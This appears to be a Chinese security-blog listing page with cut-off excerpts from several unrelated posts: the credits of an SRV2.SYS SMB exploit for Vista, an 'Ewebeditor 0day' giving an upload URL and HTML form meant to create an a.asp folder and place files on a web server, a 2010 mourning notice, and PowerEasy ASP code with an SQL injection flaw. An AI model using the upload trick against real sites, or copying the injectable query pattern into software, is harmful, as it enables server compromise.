【Exp】Microsoft SRV2.SYS SMB

Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference(内网者的福音) Exploited by Piotr Bania // www.piotrbania.com Exploit for Vista SP2/SP1 only, should be reliable! Tested on: Vista sp2 (6.0.6002.18005) Vista sp1 ultimate (6.0.6001.18000) Kudos for: Stephen, HDM, Laurent Gaffie(bug) and all the mates i know, peace. Special kudos for prdelka for testing this shit

【Oday】Ewebeditor通杀鸡肋0day

By:伟大娃娃 我曾经发现一个改版的EWEB 5.5 先访问这个地址 Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp 访问这个地址可以建立个A.ASP的文件夹…… 再用这个html代码上传。 <form action="http://www.xxx.com/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">

2010年8月15日全国哀悼日

国务院公告 为表达全国各族人民对甘肃舟曲特大山洪泥石流遇难同胞的深切哀悼,国务院决定,2010年8月15日举行全国哀悼活动,全国和驻外使领馆下

关于动易6.6 6.7注入漏洞

Sub UpdateOrder(ByVal PaymentNum, ByVal amount, ByVal eBankInfo, ByVal Remark, Status, UpdateDeliverStatus, UpdateOrderStatus)     Dim PaymentID, OrderFormID, MoneyReceipt, MoneyPayout, eBankID     Dim sqlPayment, rsPayment     Dim DoUpdate     PaymentNum = ReplaceBadChar(PaymentNum)     sqlPayment = "select * from PE_Payment where PaymentNum='" & PaymentNum & "'"     Set rsPayment = Server.CreateObject("Adodb.RecordSet")     rsPayment.Open sqlPayment, Conn, 1, 3     If rsPayment.BOF And rsPayment.EOF Then